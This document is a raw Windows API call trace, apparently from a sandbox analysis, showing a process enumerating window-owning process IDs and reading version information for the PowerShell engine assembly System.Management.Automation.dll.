	[0961.933] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xa6c
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xa68
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x9f8
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xa04
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x924
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x8dc
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x7dc
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x768
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x764
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x820
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x810
	[0961.933] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x794
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x83c
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x7ac
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xb44
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x6bc
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xb5c
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x838
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.934] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x818
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x5b8
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x494
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1ec
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x440
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x7e8
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x730
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2c8
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x31c
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x330
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x128
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x5c8
	[0961.935] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x6f8
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x358
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x73c
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xb0
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x250
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x240
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x790
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x61c
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x540
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x538
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x568
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x538
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x568
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x538
	[0961.936] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x540
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x540
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x57c
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x460
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x554
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x528
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x79c
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4e0
	[0961.937] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x460
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x460
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x44c
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x778
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x460
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x558
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x10bd8, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x25d8
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x10bb8, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2594
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x10baa, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2590
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x10b76, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2530
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x10b68, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x251c
	[0961.938] GetWindowThreadProcessId (in: hWnd=0x10b64, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2254
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10b60, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2250
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10b54, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x16f0
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10b48, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1338
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10b3e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1ca0
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10b34, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x238c
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10b2a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1b08
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10b0e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1a8c
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10af8, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x18e0
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10aec, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x2344
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10ae0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1d8c
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10ad4, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1038
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10ad0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1a58
	[0961.939] GetWindowThreadProcessId (in: hWnd=0x10acc, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1c7c
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x10ac6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1f04
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x10ac2, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x18b8
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x40278, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x22c8
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x10abe, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x21b8
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x20958, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x21c0
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x10a7a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x219c
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x10a6a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x20f4
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x10a4c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x20e4
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x10a40, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x20e8
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x10a36, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x20ec
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x20602, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x20f0
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x10a2e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1e34
	[0961.940] GetWindowThreadProcessId (in: hWnd=0x10a28, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0xc38
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x10a20, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1fe4
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x10a10, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1f10
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1f0c
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1f08
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1ef0
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1eec
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1ee4
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1ed8
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1ed0
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1e8c
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1e88
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1e84
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1604
	[0961.941] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1c2c
	[0961.942] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1c08
	[0961.942] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x1c0c
	[0961.945] WerSetFlags () returned 0x0
	[0962.239] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0962.239] CoTaskMemFree (pv=0x0) 
	[0962.240] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26da68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26da60 | out: pulNumLanguages=0x26da68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26da60) returned 1
	[0962.240] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26da68, pwszLanguagesBuffer=0x2e6f930, pcchLanguagesBuffer=0x26da60 | out: pulNumLanguages=0x26da68, pwszLanguagesBuffer=0x2e6f930, pcchLanguagesBuffer=0x26da60) returned 1
	[0962.244] CoTaskMemAlloc (cb=0x24) returned 0x52f140
	[0962.244] GetUserDefaultLocaleName (in: lpLocaleName=0x52f140, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0962.245] CoTaskMemFree (pv=0x52f140) 
	[0962.263] CoTaskMemAlloc (cb=0x104) returned 0x51b250
	[0962.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.263] CoTaskMemFree (pv=0x51b250) 
	[0962.265] CoTaskMemAlloc (cb=0x104) returned 0x51b250
	[0962.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.265] CoTaskMemFree (pv=0x51b250) 
	[0962.267] CoTaskMemAlloc (cb=0x104) returned 0x51b250
	[0962.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51b250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.267] CoTaskMemFree (pv=0x51b250) 
	[0962.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0962.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0962.276] SetErrorMode (uMode=0x1) returned 0x1
	[0962.276] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26d6e0 | out: lpFileInformation=0x26d6e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0962.276] SetErrorMode (uMode=0x1) returned 0x1
	[0962.276] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26d950 | out: lpdwHandle=0x26d950) returned 0x94c
	[0962.277] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e731c0 | out: lpData=0x2e731c0) returned 1
	[0962.278] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26d8c8, puLen=0x26d8c0 | out: lplpBuffer=0x26d8c8*=0x2e7325c, puLen=0x26d8c0) returned 1
	[0962.278] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26d838, puLen=0x26d830 | out: lplpBuffer=0x26d838*=0x2e73338, puLen=0x26d830) returned 1
	[0962.278] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0962.278] CoTaskMemAlloc (cb=0x2e) returned 0x52e3d0
	[0962.278] lstrcpyW (in: lpString1=0x52e3d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0962.278] CoTaskMemFree (pv=0x52e3d0) 
	[0962.278] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26d838, puLen=0x26d830 | out: lplpBuffer=0x26d838*=0x2e7338c, puLen=0x26d830) returned 1
	[0962.278] lstrlenW (lpString="System.Management.Automation") returned 28
	[0962.278] CoTaskMemAlloc (cb=0x3c) returned 0x488fd0
	[0962.278] lstrcpyW (in: lpString1=0x488fd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0962.278] CoTaskMemFree (pv=0x488fd0) 
	[0962.278] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26d838, puLen=0x26d830 | out: lplpBuffer=0x26d838*=0x2e733e8, puLen=0x26d830) returned 1
	[0962.278] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0962.278] CoTaskMemAlloc (cb=0x20) returned 0x52f1a0
	[0962.278] lstrcpyW (in: lpString1=0x52f1a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0962.278] CoTaskMemFree (pv=0x52f1a0) 
	[0962.278] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26d838, puLen=0x26d830 | out: lplpBuffer=0x26d838*=0x2e73428, puLen=0x26d830) returned 1
	[0962.278] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0962.278] CoTaskMemAlloc (cb=0x44) returned 0x488fd0
	[0962.278] lstrcpyW (in: lpString1=0x488fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0962.278] CoTaskMemFree (pv=0x488fd0) 
	[0962.279] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26d838, puLen=0x26d830 | out: lplpBuffer=0x26d838*=0x2e73490, puLen=0x26d830) returned 1
	[0962.279] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0962.279] CoTaskMemAlloc (cb=0x76) returned 0x4b3890
	[0962.279] lstrcpyW (in: lpString1=0x4b3890, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0962.279] CoTaskMemFree (pv=0x4b3890) 
	[0962.279] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26d838, puLen=0x26d830 | out: lplpBuffer=0x26d838*=0x2e7352c, puLen=0x26d830) returned 1
	[0962.279] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0962.279] CoTaskMemAlloc (cb=0x44) returned 0x488fd0
	[0962.279] lstrcpyW (in: lpString1=0x488fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0962.279] CoTaskMemFree (pv=0x488fd0) 
	[0962.279] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26d838, puLen=0x26d830 | out: lplpBuffer=0x26d838*=0x2e73590, puLen=0x26d830) returned 1
	[0962.279] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0962.279] CoTaskMemAlloc (cb=0x58) returned 0x465130
	[0962.279] lstrcpyW (in: lpString1=0x465130, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0962.279] CoTaskMemFree (pv=0x465130) 
	[0962.279] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26d838, puLen=0x26d830 | out: lplpBuffer=0x26d838*=0x2e7360c, puLen=0x26d830) returned 1
	[0962.279] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0962.279] CoTaskMemAlloc (cb=0x20) returned 0x52f1a0
	[0962.279] lstrcpyW (in: lpString1=0x52f1a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0962.279] CoTaskMemFree (pv=0x52f1a0) 
	[0962.279] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26d838, puLen=0x26d830 | out: lplpBuffer=0x26d838*=0x2e732b4, puLen=0x26d830) returned 1
	[0962.279] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0962.279] CoTaskMemAlloc (cb=0x66) returned 0x4cdb80
	[0962.279] lstrcpyW (in: lpString1=0x4cdb80, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0962.279] CoTaskMemFree (pv=0x4cdb80) 
	[0962.279] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26d838, puLen=0x26d830 | out: lplpBuffer=0x26d838*=0x0, puLen=0x26d830) returned 0
	[0962.279] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26d838, puLen=0x26d830 | out: lplpBuffer=0x26d838*=0x0, puLen=0x26d830) returned 0
	[0962.279] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26d838, puLen=0x26d830 | out: lplpBuffer=0x26d838*=0x0, puLen=0x26d830) returned 0
	[0962.279] VerQueryValueW (in: pBlock=0x2e731c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26d808, puLen=0x26d800 | out: lplpBuffer=0x26d808*=0x2e7325c, puLen=0x26d800) returned 1
	[0962.279] CoTaskMemAlloc (cb=0x204) returned 0x462f90
	[0962.279] VerLanguageNameW (in: wLang=0x0, szLang=0x462f90, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0962.279] CoTaskMemFree (pv=0x462f90) 
